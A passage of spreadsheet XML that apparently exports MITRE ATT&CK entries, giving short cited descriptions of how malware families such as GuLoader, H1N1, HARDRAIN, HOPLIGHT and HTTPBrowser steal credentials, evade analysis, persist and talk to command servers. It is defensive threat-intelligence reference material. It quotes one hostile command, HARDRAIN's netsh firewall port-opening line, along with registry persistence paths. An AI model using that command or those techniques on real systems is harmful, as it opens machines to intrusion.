    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can collect the OS, and build version on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--eed367b8-b1d1-492e-a376-6725b6db7103</t>
  </si>
  <si>
    <t xml:space="preserve">[GrimAgent](https://attack.mitre.org/software/S0632) has used &lt;code&gt;Accept-Language&lt;/code&gt; to identify hosts in the United Kingdom, United States, France, and Spain.(Citation: Group IB GrimAgent July 2021) </t>
  </si>
  <si>
    <t>relationship--ac01b568-6d51-415f-8dd4-0d148fa204fb</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can identify the country code on a compromised host.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--ac7a8c0c-bdbc-4ed5-91f9-b00212fe7189</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can enumerate the IP and domain of a target system.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--4bdb2764-695c-42d8-afac-f5618660cae7</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can identify the user id on a target machine.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--38f5765d-0e42-4e63-9411-185983c6ca21</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can sleep for 195 - 205 seconds after payload execution and before deleting its task.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--ac04e244-5ab3-4ac7-8f5d-575ec8ff67f0</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to use HTTP for C2 communications.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--ed218127-ef3a-4038-b864-3f0ceb6b4bd1</t>
  </si>
  <si>
    <t>[GrimAgent](https://attack.mitre.org/software/S0632) can use the Windows Command Shell to execute commands, including its own removal.(Citation: Group IB GrimAgent July 2021)</t>
  </si>
  <si>
    <t>relationship--251c7f06-a012-4fe1-9520-21f051a47255</t>
  </si>
  <si>
    <t>S0561</t>
  </si>
  <si>
    <t>GuLoader</t>
  </si>
  <si>
    <t>malware--45c759ac-b490-48bb-80d4-c8eee3431027</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can delete its executable from the &lt;code&gt;AppData\Local\Temp&lt;/code&gt; directory on the compromised host.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--8479b281-c987-4b73-b85e-3f69fa024b4c</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can download further malware for execution on the victim's machine.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>relationship--9bd2274b-95bc-4b7f-93f5-0b658d256217</t>
  </si>
  <si>
    <t>The [GuLoader](https://attack.mitre.org/software/S0561) executable has been retrieved via embedded macros in malicious Word documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--fa777c92-0431-4916-9527-4077e8b10559</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has relied upon users clicking on links to malicious documents.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--ba79589f-f4e2-497b-b25b-a6a0abf3eedd</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can use a number of different APIs for discovery and execution.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>relationship--5849f602-f706-4ab3-84e1-44ee1a923ba9</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</si>
  <si>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</si>
  <si>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relationship--30df477a-f775-4349-ba03-07a3f4293db4</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can establish persistence via the Registry under &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--d02d208e-2b9a-4613-bc89-df3953ad9576</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has been spread in phishing campaigns using malicious web links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>relationship--148f4700-9a24-4729-af76-5ff9eafb997c</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call &lt;code&gt;EnumWindows&lt;/code&gt;, and checking for Qemu guest agent.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>relationship--4cacddfb-d437-4495-bacb-08b316814c1d</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to perform anti-debugging based on time checks, API calls, and CPUID.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>relationship--d231c64f-4a5f-43b8-a6e8-6ddd74d14eb3</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) can use HTTP to retrieve additional binaries.(Citation: Unit 42 NETWIRE April 2020)(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>relationship--b65a3c77-5be9-4ccc-a995-029086cb53c4</t>
  </si>
  <si>
    <t>[GuLoader](https://attack.mitre.org/software/S0561) has the ability to download malware from Google Drive.(Citation: Medium Eli Salem GuLoader April 2021)</t>
  </si>
  <si>
    <t>relationship--cebec7e0-7be7-4bcf-936f-bd7622d559c7</t>
  </si>
  <si>
    <t>S0132</t>
  </si>
  <si>
    <t>H1N1</t>
  </si>
  <si>
    <t>malware--f8dfbc54-b070-4224-b560-79aaa5f835bd</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe).(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--8961d93e-ec51-42dd-8f76-54d46ea21967</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--0d4e8cb8-c265-449a-b010-f4614135572f</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) obfuscates C2 traffic with an altered version of base64.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--c79d7110-46bb-4b6d-a256-87bd1b6379a3</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Firewall.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--43c16333-5f95-45b4-aedd-b90ccb56da3a</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Security Center, and Windows Defender.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--1082a68e-549b-47d5-9eb3-e719f01ce42b</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--a7e5ffbc-d123-4f62-88eb-36b32656cd35</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) disable recovery options and deletes shadow copies from the victim.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--2d090e9d-f9fb-4f73-99df-0e17a7489adb</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses multiple techniques to obfuscate strings, including XOR.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>relationship--4527c528-8377-4349-ae5c-95c04cabd3d4</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to removable media.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--5b2682dc-f64d-482b-8fc4-132dad2727d9</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) uses a custom packing algorithm.(Citation: Cisco H1N1 Part 1)</t>
  </si>
  <si>
    <t>relationship--98aeed7c-e88b-4c5b-8e8e-21ee3534abe9</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) encrypts C2 traffic using an RC4 key.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--ca8ed9e2-f7a6-4d54-b450-94c187b1f9b6</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) has functionality to copy itself to network shares.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--1539eaf6-e4ea-4e9d-af2b-2594d1ca5b38</t>
  </si>
  <si>
    <t>[H1N1](https://attack.mitre.org/software/S0132) kills and disables services by using cmd.exe.(Citation: Cisco H1N1 Part 2)</t>
  </si>
  <si>
    <t>relationship--4a419b18-5fb2-43a0-8c0a-6521b8d9de63</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can delete a specified file.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--d0013f9d-4243-4ade-8d06-a2cd6158ca58</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can execute PowerShell scripts.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--bfdffca9-6418-486d-833f-84f3920fcb71</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about running processes on the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--61fa303b-a9ff-419f-b3ac-96e43e37b6e5</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain screenshots from the victim.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--b4795040-fe94-429a-9853-f30c09ba05aa</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can obtain information about the OS, processor, and BIOS.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--d6154157-fe69-4da3-8cc3-790eecf33f8c</t>
  </si>
  <si>
    <t>[HALFBAKED](https://attack.mitre.org/software/S0151) can use WMI queries to gather system information.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--77ea5d03-715b-4247-8484-6c1cf2bc7984</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>relationship--1e2baacb-9033-49a9-890a-f48c87ab1531</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) has used &lt;code&gt;-WindowStyle hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>relationship--3877277b-ae7c-4cb8-b564-3263b235c1e7</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</si>
  <si>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</si>
  <si>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relationship--c7420523-7dc0-4118-a075-93f9c0268627</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is known to use PowerShell.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>relationship--a3eca9d0-bc4b-48a8-801d-9aaa757bfe72</t>
  </si>
  <si>
    <t>[HAMMERTOSS](https://attack.mitre.org/software/S0037) is controlled via commands that are appended to image files.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>relationship--34c4b497-00e3-415c-8e09-3b73667d9bbe</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</si>
  <si>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</si>
  <si>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relationship--3ebc8829-f260-4d75-817a-cd23a4ebb194</t>
  </si>
  <si>
    <t>The "Uploader" variant of [HAMMERTOSS](https://attack.mitre.org/software/S0037) visits a hard-coded server over HTTP/S to download the images [HAMMERTOSS](https://attack.mitre.org/software/S0037) uses to receive commands.(Citation: FireEye APT29)</t>
  </si>
  <si>
    <t>relationship--4556634c-06f7-48f9-bcaa-22d023524068</t>
  </si>
  <si>
    <t>can download and execute a second-stage payload.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--72ac0ee1-24c0-4b4e-b96d-f42575ce9af8</t>
  </si>
  <si>
    <t>can collect system information, including computer name, system manufacturer, IsDebuggerPresent state, and execution path.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--67ffaecc-e47d-47a1-93fd-82d21018ad8b</t>
  </si>
  <si>
    <t>can collect the victim user name.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--6eb55cc5-1c90-44ce-ab80-0c938521f1cf</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) opens the Windows Firewall to modify incoming connections.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>relationship--e1614b27-52c5-41e5-bbcb-ab08a9a5e85c</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) binds and listens on port 443 with a FakeTLS method.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>relationship--53e123a8-0794-4bec-b71b-3c4b4a94057f</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses FakeTLS to communicate with its C2 server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>relationship--9e193b3a-3f21-43aa-b373-6fcec59ff2c7</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses the command &lt;code&gt;cmd.exe /c netsh firewall add portopening TCP 443 "adp"&lt;/code&gt; and makes the victim machine function as a proxy server.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>relationship--74bb0ae9-589c-4479-9bd5-b9a71a20e82d</t>
  </si>
  <si>
    <t>[HARDRAIN](https://attack.mitre.org/software/S0246) uses cmd.exe to execute &lt;code&gt;netsh&lt;/code&gt;commands.(Citation: US-CERT HARDRAIN March 2018)</t>
  </si>
  <si>
    <t>relationship--8576db0e-6a7c-40d4-b797-fb0094d5849f</t>
  </si>
  <si>
    <t>S0391</t>
  </si>
  <si>
    <t>HAWKBALL</t>
  </si>
  <si>
    <t>malware--12a7450d-b03e-4990-a5b8-b405ab9c803b</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted data with XOR before sending it over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--9ee0e760-3084-4341-b1c3-3f50a0506595</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used an OLE object that uses Equation Editor to drop the embedded shellcode.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--160a52b3-8acd-4f19-810f-ac4ce96319d3</t>
  </si>
  <si>
    <t>06 July 2019</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has sent system information and files over the C2 channel.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--7ac3aabb-ed01-4e7f-a247-e043261a1c3b</t>
  </si>
  <si>
    <t xml:space="preserve">[HAWKBALL](https://attack.mitre.org/software/S0391) has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.(Citation: FireEye HAWKBALL Jun 2019) </t>
  </si>
  <si>
    <t>relationship--b07612e3-9f6f-4c55-a63d-629b0e4c099f</t>
  </si>
  <si>
    <t xml:space="preserve">[HAWKBALL](https://attack.mitre.org/software/S0391) has the ability to delete files.(Citation: FireEye HAWKBALL Jun 2019)	</t>
  </si>
  <si>
    <t>relationship--e8164787-78fa-4a4a-89b1-8d5dbfbef592</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--ec61cd5f-b6aa-4aee-acb2-2882b8914c68</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has encrypted the payload with an XOR-based algorithm.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--206ef2a2-192c-4739-a1bf-b5616dcacfed</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the OS version, architecture information, and computer name.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--3dbae391-a354-488a-b0ab-426d1a055413</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) can collect the user name of the system.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--6337062d-04c1-43df-a72b-8719a31102a0</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has used HTTP to communicate with a single hard-coded C2 server.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--45f68415-1d63-4a14-9c6b-a5ac81e52a66</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) has created a cmd.exe reverse shell, executed commands, and uploaded output via the command line.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>relationship--b34853df-c04a-4656-a5fe-3ee253c4de4e</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) kills anti-virus found on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--7209b3d7-b8c8-4fc0-89fb-a5448f015540</t>
  </si>
  <si>
    <t>[HDoor](https://attack.mitre.org/software/S0061) scans to identify open ports on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>relationship--db283fff-4b13-4c79-85f0-5cdb6b76e964</t>
  </si>
  <si>
    <t>S0617</t>
  </si>
  <si>
    <t>HELLOKITTY</t>
  </si>
  <si>
    <t>malware--5d11d418-95dd-4377-b782-23160dfa17b4</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can use an embedded RSA-2048 public key to encrypt victim data for ransom.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--4765866e-48c9-48f7-a2c0-cb1251680b56</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can delete volume shadow copies on compromised hosts.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--84d34520-0386-4d41-96b6-3350d727150b</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) has the ability to enumerate network resources.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--8debe90d-927a-4195-b796-793e9b1730ee</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can search for specific processes to terminate.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--a969a06c-523f-4cde-a92c-539dd1c003f9</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can enumerate logical drives on a target system.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--98c69e3a-1fc1-4da2-adc5-a33723ab1be4</t>
  </si>
  <si>
    <t>[HELLOKITTY](https://attack.mitre.org/software/S0617) can use WMI to delete volume shadow copies.(Citation: FireEye FiveHands April 2021)</t>
  </si>
  <si>
    <t>relationship--93086acc-65f7-4e41-b765-04bae1bc12fd</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) injects a DLL for [Downdelph](https://attack.mitre.org/software/S0134) into the explorer.exe process.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--b97e696f-6386-4b15-8f24-81d0abe51830</t>
  </si>
  <si>
    <t>[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)</t>
  </si>
  <si>
    <t>relationship--69b9edd8-c1a8-4cbd-bd94-9af0fdefe013</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) can perform credential dumping.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--7ad1bbdf-4a00-426a-b130-fb4425ad2622</t>
  </si>
  <si>
    <t>Some strings in [HOMEFRY](https://attack.mitre.org/software/S0232) are obfuscated with XOR x56.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--8c7631c4-bc83-4ee5-abb5-c039d63da619</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) uses a command-line interface.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>relationship--fc3ec682-31cc-4e74-8d04-a5fdef9e8410</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) can enumerate device drivers located in the registry at `HKLM\Software\WBEM\WDM`.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--04a39f08-17e1-46e8-aba0-db4ef1318ba1</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified the firewall using [netsh](https://attack.mitre.org/software/S0108).(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--d03e6e8b-bc2e-4c7b-8cde-58987659fbbb</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has used its C2 channel to exfiltrate data.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--7101e112-c694-498f-be15-c0790f5d8547</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple C2 channels in place in case one fails.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--1708aa35-a362-429f-be06-82dc106dfeb4</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed enumerating system drives and partitions.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--536a0d57-9faf-4baa-83de-40c7aaafe28c</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has the ability to connect to a remote host in order to upload and download files.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--b4349e95-eeff-4784-8a7d-2c6d60a734dd</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--0cf14628-b4c0-470a-9059-43fc562717d8</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has connected outbound over TCP port 443 with a FakeTLS method.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--36983a10-4fdb-4bfc-83a0-78f4d11e83df</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed loading several APIs associated with Pass the Hash.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--4973496a-2a49-4428-b2db-0629a97df9d3</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has injected into running processes.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--d0cc4ab9-e211-4824-af74-7d88699731a2</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has multiple proxy options that mask traffic between the malware and the remote operators.(Citation: US-CERT HOPLIGHT Apr 2019)	
</t>
  </si>
  <si>
    <t>relationship--321703ba-7871-46c0-837e-6a2e1dc5aba9</t>
  </si>
  <si>
    <t>A variant of [HOPLIGHT](https://attack.mitre.org/software/S0376) hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key &lt;code&gt;SYSTEM\CurrentControlSet\Control\Lsa Name&lt;/code&gt;.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--1c548d89-557e-4c48-9b71-8a761d94e77b</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has the capability to harvest credentials and passwords from the SAM database.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--6c7c4191-2d75-4ce8-b937-b9abb77d7b5b</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has used svchost.exe to execute a malicious DLL .(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--8eed7d01-46dc-4b25-a42d-bd9afcb84963</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has utilized Zlib compression to obfuscate the communications payload. (Citation: US-CERT HOPLIGHT Apr 2019)	
</t>
  </si>
  <si>
    <t>relationship--74499e24-ecca-46bb-87fb-e8beb25f1c11</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting victim machine information like OS version, volume information, and more.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--7aeee346-4272-45c4-b351-1cf4ac98a15d</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) has been observed collecting system time from victim machines.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>relationship--d060e004-9eb7-425e-924c-0555fa80e083</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) can launch cmd.exe to execute commands on the system.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--6cd1da58-6532-4800-816c-d1a74d586cdc</t>
  </si>
  <si>
    <t xml:space="preserve">[HOPLIGHT](https://attack.mitre.org/software/S0376) has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.(Citation: US-CERT HOPLIGHT Apr 2019)	</t>
  </si>
  <si>
    <t>relationship--b55a3ac1-bb12-4507-a323-221b893df51b</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can inject into into running processes.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>relationship--60a46293-ec9e-4931-8315-03b4f68c2e74</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can proxy TCP socket connections to obfuscate command and control infrastructure.(Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>relationship--1b27cec5-241a-4c2e-a3db-e9cea241496c</t>
  </si>
  <si>
    <t>[HTRAN](https://attack.mitre.org/software/S0040) can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>relationship--4b14d96b-1664-4072-a49a-3a990a13ca83</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>relationship--1762fe5a-0810-4179-bfb0-16d965ffe055</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DLL side-loading.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--71ede2de-7e5f-49fa-ac07-9322ef4857ae</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DNS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>relationship--7eb3d9b7-8058-4d26-9196-b9a79716c5f9</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) deletes its original installer file once installation is complete.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>relationship--b13fd1c9-a42c-45fc-9db8-1cd691740e0a</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of listing files, folders, and drives on a victim.(Citation: Dell TG-3390)(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>relationship--a3251b26-7012-4f26-9c5d-1fb9d69b8569</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of writing a file to the compromised system from the C2 server.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--0e12d7d1-5c46-4314-97fb-263853eed6af</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of capturing keystrokes on victims.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--ab7faed6-3c50-4b04-a31b-ac2c933a51ef</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s installer contains a malicious file named navlu.dll to decrypt and run the RAT. navlu.dll is also the name of a legitimate Symantec DLL.(Citation: ZScaler Hacking Team)</t>
  </si>
  <si>
    <t>relationship--654d9e83-9501-4de8-8828-1a1ebf36bc8f</t>
  </si>
